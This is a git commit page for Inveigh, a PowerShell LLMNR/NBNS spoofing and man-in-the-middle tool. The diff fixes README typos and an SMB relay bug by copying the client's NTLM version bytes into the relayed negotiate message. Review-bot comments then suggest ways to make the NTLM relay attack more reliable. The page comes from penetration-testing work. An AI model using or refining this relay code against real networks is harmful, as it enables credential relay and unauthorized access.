author | Kevin Robertson <robertsonk@gmail.com> | 2017-02-06 22:55:51 -0500 |
---|---|---|
committer | Kevin Robertson <robertsonk@gmail.com> | 2017-02-06 22:55:51 -0500 |
commit | 475f82d7b3dffd36a913a14bd4073ec472c430f2 (patch) | |
tree | 7e323e6ade9ba14511c5a0a584b20c6e2ae2d024 | |
parent | 4ec48bad98135e578c91c30e9cee0bf2cbce36d8 (diff) | |
Fixed a bug that was causing auth failures during SMB relay
-rw-r--r-- | README.md | 4 | ||||
-rw-r--r-- | Scripts/Inveigh-Relay.ps1 | 6 |
2 files changed, 5 insertions, 5 deletions
@@ -68,7 +68,7 @@ Inveigh is a Windows PowerShell LLMNR/NBNS spoofer/man-in-the-middle tool design
 Import-Module ./Inveigh.ps1;Invoke-Inveigh
 * To execute with ConsoleOutput, FileOutput, and the NBNS spoofer enabled.
- Invoke-Inveigh -ConsoleOutpuy Y -FileOutput Y -NBNS Y
+ Invoke-Inveigh -ConsoleOutput Y -FileOutput Y -NBNS Y
 ##### Screenshot:
@@ -150,7 +150,7 @@ Inveigh is a Windows PowerShell LLMNR/NBNS spoofer/man-in-the-middle tool design
 Invoke-InveighUnprivileged
 * To execute with ConsoleOutput and FileOutput enabled and a run time of 30 minutes.
- Invoke-InveighUnprivileged -ConsoleOutpuy Y -FileOutput Y -RunTime 30
+ Invoke-InveighUnprivileged -ConsoleOutput Y -FileOutput Y -RunTime 30
 ##### Screenshot:
diff --git a/Scripts/Inveigh-Relay.ps1 b/Scripts/Inveigh-Relay.ps1
index b7f687b..ef5d74a 100644
--- a/Scripts/Inveigh-Relay.ps1
+++ b/Scripts/Inveigh-Relay.ps1
@@ -1445,7 +1445,7 @@ $SMB_relay_challenge_scriptblock =
 if($SMB_version -eq 'SMB1')
 {
 $packet_SMB_header = Get-PacketSMBHeader 0x73 0x18 0x01,0x48 0xff,0xff $inveigh.process_ID_bytes 0x00,0x00
-$packet_NTLMSSP_negotiate = Get-PacketNTLMSSPNegotiate 0x07,0x82,0x08,0xa2 0x06,0x03,0x80,0x25,0x00,0x00,0x00,0x0f
+$packet_NTLMSSP_negotiate = Get-PacketNTLMSSPNegotiate 0x07,0x82,0x08,0xa2 $HTTP_request_bytes[($HTTP_request_bytes.length-8)..($HTTP_request_bytes.length)]
 $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
 $NTLMSSP_negotiate = ConvertFrom-PacketOrderedDictionary $packet_NTLMSSP_negotiate
 $packet_SMB_data = Get-PacketSMBSessionSetupAndXRequest $NTLMSSP_negotiate
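Review bot: The added line copies the client's NTLM version bytes into the relayed NEGOTIATE_MESSAGE, but the negotiate flags in the same call stay hard-coded as `0x07,0x82,0x08,0xa2`; if the auth failures stopped because the target verifies the AUTHENTICATE MIC over the exact negotiate it received (the commit message does not say why), a client whose flags differ from that constant will still fail for the same reason. Assuming `$HTTP_request_bytes` is the decoded NTLM negotiate from the client's Authorization header (it is defined outside the hunk), the client flags are `$HTTP_request_bytes[12..15]` and per MS-NLMP the version field sits at fixed offset 32..39 whenever the VERSION flag is set, so `$packet_NTLMSSP_negotiate = Get-PacketNTLMSSPNegotiate $HTTP_request_bytes[12..15] $HTTP_request_bytes[32..39]` reproduces the client's message even when a domain/workstation payload follows the version field and a last-8-bytes slice would pick up payload instead. Separately, the slice's upper bound `($HTTP_request_bytes.length)` is one past the last valid index; PowerShell drops the out-of-range element silently here, but `($HTTP_request_bytes.length-1)` states the intent and does not depend on that leniency. The `if($SMB_version -eq 'SMB1')` branch is visible, but `$SMB_relay_challenge_scriptblock` starts and ends outside the hunk.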
@@ -1458,7 +1458,7 @@ $SMB_relay_challenge_scriptblock =
 {
 $SMB2_message_ID += 1
 $packet_SMB2_header = Get-PacketSMB2Header 0x01,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
-$packet_NTLMSSP_negotiate = Get-PacketNTLMSSPNegotiate 0x07,0x82,0x08,0xa2 0x06,0x03,0x80,0x25,0x00,0x00,0x00,0x0f
+$packet_NTLMSSP_negotiate = Get-PacketNTLMSSPNegotiate 0x07,0x82,0x08,0xa2 $HTTP_request_bytes[($HTTP_request_bytes.length-8)..($HTTP_request_bytes.length)]
 $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
 $NTLMSSP_negotiate = ConvertFrom-PacketOrderedDictionary $packet_NTLMSSP_negotiate
 $packet_SMB2_data = Get-PacketSMB2SessionSetupRequest $NTLMSSP_negotiate
@@ -2516,7 +2516,7 @@ $HTTP_scriptblock =
 $SMB_relay_NTLM_challenge = $SMB_relay_bytes[($SMB_relay_NTLMSSP_bytes_index + 24)..($SMB_relay_NTLMSSP_bytes_index + 31)]
 $SMB_relay_target_details = $SMB_relay_bytes[($SMB_relay_NTLMSSP_bytes_index + 56 + $SMB_domain_length)..($SMB_relay_NTLMSSP_bytes_index + 55 + $SMB_domain_length + $SMB_target_length)]
 $SMB_session_ID = $SMB_relay_bytes[44..51]
-
+
 if([System.BitConverter]::ToString($SMB_relay_bytes[4..7]) -eq 'ff-53-4d-42')
 {
 $SMB_version -eq 'SMB1'
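Review bot: This SMB2 branch now repeats verbatim the slice expression the SMB1 branch received in the previous hunk, so the two relayed negotiates will silently drift if one is ever adjusted; computing it once ahead of the `if($SMB_version -eq 'SMB1')` split, e.g. `$NTLM_client_version = $HTTP_request_bytes[32..39]`, and passing `$NTLM_client_version` to both `Get-PacketNTLMSSPNegotiate` calls keeps them identical. Offset 32..39 is where MS-NLMP places the NEGOTIATE_MESSAGE version field when the VERSION flag is set, which is more robust than `($HTTP_request_bytes.length-8)..($HTTP_request_bytes.length)`: that slice assumes nothing follows the version field, and its upper bound is one past the last index (PowerShell drops it silently, but `length-1` is what is meant). This assumes `$HTTP_request_bytes` holds the decoded client NTLM negotiate, which is assigned outside the hunk; the `else` that opens this block and the enclosing scriptblock are also outside the hunk.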